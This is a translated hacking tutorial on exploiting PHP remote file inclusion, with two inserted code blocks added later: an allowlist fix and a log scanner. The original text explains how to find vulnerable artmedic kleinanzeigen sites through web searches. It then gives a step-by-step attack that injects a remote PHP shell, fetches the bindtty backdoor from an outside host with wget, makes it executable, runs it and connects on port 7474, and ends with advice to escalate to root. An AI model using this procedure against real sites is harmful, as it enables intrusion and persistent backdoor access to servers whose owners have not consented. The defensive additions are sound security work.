Exploitation of Remote File Inclusion Vulnerability

Source: Internet
Author: User

****************************
* Author: cracklove        *
* Email: cracklove#zj.com  *
* Homepage: N/A, maybe down *
****************************
1) What is the Remote File Inclusion Vulnerability?
Let's take a look at the following code:
<?php
// ... code ...

include($page);

// ... code ...
?>

Nothing here filters the $page variable, so whoever sends the request decides whether $page names a local file or a file on a remote server. We can therefore pass the URL of a file on a server we control as the parameter and have it submitted into $page: PHP fetches that remote file and executes it with the permissions of the web server user.
This requires that $page be filled from the request (register_globals, or an explicit $page = $_GET['page']) and that URL includes be enabled (allow_url_fopen in PHP 4, and additionally allow_url_include since PHP 5.2, which defaults to Off).

2) Preliminary Application of the Vulnerability
Suppose the index.php of a website contains the following code:
<?php
// ... code ...

include($page);

// ... code ...
?>
We can submit:
http://siteurl.tld/index.php?page=http://<remote server>/<file name>
Suppose the remote file is warez.php and its content is:
<?php
// ... code ...

system("ls /tmp/");

// ... code ...
?>
The target then fetches warez.php from our server and executes it with the web server's permissions. To put it bluntly, the files under /tmp are listed in the response.
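To put the fix next to the bug from sections 1 and 2, here is an added example (not code from the original article) showing the unfiltered include beside an allowlisted replacement. It is PHP 7.1+ command-line code; the page names home and contact and the pages/ directory are hypothetical.

```php
<?php
// Added example, not from the original article. The vulnerable include from
// sections 1 and 2 next to an allowlisted replacement. Run: php rfi_demo.php
// The page names and the pages/ directory are hypothetical.

// The article's pattern. When $page comes straight from the request
// (register_globals, or $page = $_GET['page']) and URL includes are allowed,
// a value like http://attacker.example/warez.php is fetched and executed
// with the web server's permissions.
function vulnerable_include(string $page): void
{
    include $page;   // no validation of $page at all
}

// Hardened version: the request parameter is only ever used as a key into a
// fixed table. The user never supplies a path, so remote URLs, absolute
// paths, ../ traversal and null bytes are all rejected by the same lookup.
const ALLOWED_PAGES = [
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(string $page): ?string
{
    return ALLOWED_PAGES[$page] ?? null;
}

function safe_include(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(400);
        echo "unknown page\n";
        return;
    }
    include $path;
}

// Attacker-style inputs against resolve_page(): only the exact key passes.
$samples = [
    'home',
    'http://attacker.example/warez.php',
    '../../../../etc/passwd',
    "home\0.jpg",
    'Home',
];
foreach ($samples as $s) {
    printf("%-40s => %s\n", addcslashes($s, "\0"), resolve_page($s) ?? 'REJECTED');
}
```

Only the exact key "home" resolves; every other sample prints REJECTED. As defence in depth, also set allow_url_include = Off (PHP 5.2 and later), leave allow_url_fopen off unless something needs it, and do not rely on register_globals, which was removed in PHP 5.4.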

3) Practical Exercise
Enough theory; now let's put it into practice.
(1) Preparations:
① A website with a Remote File Inclusion vulnerability
② A PHP shell
③ A backdoor

For ①, you can watch www.cnns.net or www.securiteam.com for recently published vulnerabilities. Here we use the then-current artmedic kleinanzeigen vulnerability.
artmedic kleinanzeigen: the Remote File Inclusion vulnerability is caused by the lack of filtering of the $site variable in index.php, so you can submit a URL of the form:
http://<artmedic kleinanzeigen URL>/path/index.php?site=http://<phpshell URL>
So how do we find sites that run artmedic kleinanzeigen? Here is a tip. I went to the official artmedic kleinanzeigen site and opened the program's demo; clicking a single link took me to
http://siteurl.com/index.php?site=anzeigenmaerktestart
so searching the web for
index.php?site=anzeigenmaerktestart
turns up most of the sites that run artmedic kleinanzeigen. We can then try them one by one!

For ②, I recommend the data cha0s php Command/safemode exploit 4.1, or angel's saphpshell and phpspy, which are all quite capable.

For ③, you can use a program that binds a shell to a port and then telnet to that port. You could use the Digit-Labs connect-back backdoor that San used before; I usually use bindtty, which binds to port 7474.

(2) Start the Exploitation
① Submit http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=id
Explanation: cse.gif is the data cha0s php Command/safemode exploit 4.1 mentioned above (PHP code stored under a .gif name, so that the server hosting it serves it as a plain file instead of executing it), and cmd=id asks which user the commands run as.
Typically the result is uid=99(nobody) gid=99(nobody) groups=99(nobody): the uid is not 0, so we are not root.
If the command runs at all, system() and the other command-execution functions have not been disabled, and we can go on executing commands freely!

② Submit http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=wget http://phphot.com/bindtty -O /tmp/bindtty
This downloads bindtty into the /tmp directory. Why /tmp? Because /tmp is generally writable by everyone. (A browser URL-encodes the spaces in the command for you; with a tool such as curl you must encode them as %20 yourself.)

③ Once the file is downloaded, you must set its mode bits, otherwise the system reports that you lack permission:
http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=chmod 775 /tmp/bindtty
Now bindtty is executable! (If /tmp is mounted noexec, execution will still fail and you need another writable directory.)

④ Run bindtty
http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=/tmp/bindtty
If it succeeds, it prints "daemon is starting... OK, pid=XXXX".
As mentioned above, bindtty binds to port 7474, so we can now telnet to the host on port 7474.
PS: using the Windows command prompt for telnet is not recommended, as the terminal output gets garbled; PuTTY is recommended.

Escalating to root: at this point the job is done. Look up an exploit matching the system information shown by cse.gif to escalate privileges.
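On the defensive side of the same requests, here is an added example (not code from the original article, PHP 7.1+) that scans access-log lines for the pattern used in steps ① to ④: a query parameter whose decoded value is itself a URL. The four log lines are constructed for the demonstration and the hostnames in them are hypothetical.

```php
<?php
// Added example, not from the original article. Scans web server access-log
// lines (combined format) for remote-file-inclusion requests: any query
// parameter whose decoded value starts with a URL scheme, as in
// index.php?site=http://.../cse.gif?cmd=id above. The log lines are
// constructed for this demo and the hostnames in them are hypothetical.

$sampleLog = <<<'LOG'
203.0.113.5 - - [10/Oct/2004:13:55:36 +0000] "GET /index.php?site=anzeigenmaerktestart HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.9 - - [10/Oct/2004:13:56:01 +0000] "GET /index.php?site=http://phphot.example/cse.gif?cmd=id HTTP/1.1" 200 812 "-" "Mozilla/4.0"
203.0.113.9 - - [10/Oct/2004:13:56:40 +0000] "GET /index.php?site=http%3A%2F%2Fphphot.example%2Fcse.gif%3Fcmd%3Dwget%20http%3A%2F%2Fphphot.example%2Fbindtty%20-O%20%2Ftmp%2Fbindtty HTTP/1.1" 200 640 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Oct/2004:13:57:12 +0000] "GET /index.php?site=contact&ref=http://partner.example/ HTTP/1.1" 200 4410 "-" "Mozilla/4.0"
LOG;

// Prefixes that PHP's stream wrappers will fetch when URL includes are on.
const REMOTE_SCHEMES = ['http://', 'https://', 'ftp://', 'ftps://', 'php://', 'data:'];

// Return [param => decoded value] for every query parameter whose value is a
// remote resource, or [] for a clean request path.
function rfi_parameters(string $requestPath): array
{
    $q = strpos($requestPath, '?');
    if ($q === false) {
        return [];
    }
    $query = substr($requestPath, $q + 1);
    if (($hash = strpos($query, '#')) !== false) {
        $query = substr($query, 0, $hash);
    }
    $found = [];
    // Split on '&' only; a '?' inside a value (the nested ?cmd=) stays in it.
    foreach (explode('&', $query) as $pair) {
        [$k, $v] = array_pad(explode('=', $pair, 2), 2, '');
        $v = rawurldecode($v);          // undo %3A%2F%2F and %20
        foreach (REMOTE_SCHEMES as $scheme) {
            if (stripos($v, $scheme) === 0) {
                $found[rawurldecode($k)] = $v;
                break;
            }
        }
    }
    return $found;
}

// Parse each log line and collect hits as [client ip, parameter, value].
function scan_log(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) /', $line, $m)) {
            continue;                    // not a combined-format request line
        }
        foreach (rfi_parameters($m[2]) as $param => $value) {
            $hits[] = [$m[1], $param, $value];
        }
    }
    return $hits;
}

foreach (scan_log($sampleLog) as [$ip, $param, $value]) {
    printf("%s  %s=%s\n", $ip, $param, $value);
}
```

The second and third lines are reported with their decoded commands (the cmd=id probe and the wget into /tmp), which is what the procedure above looks like from the server side. The fourth line is also reported, because ref= legitimately carries a URL: when turning this into a rule, exclude parameters that are meant to hold URLs, or weight hits by signals such as a nested ?cmd= or a /tmp/ path in the value.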

That's about it. If you have any questions, please post them.
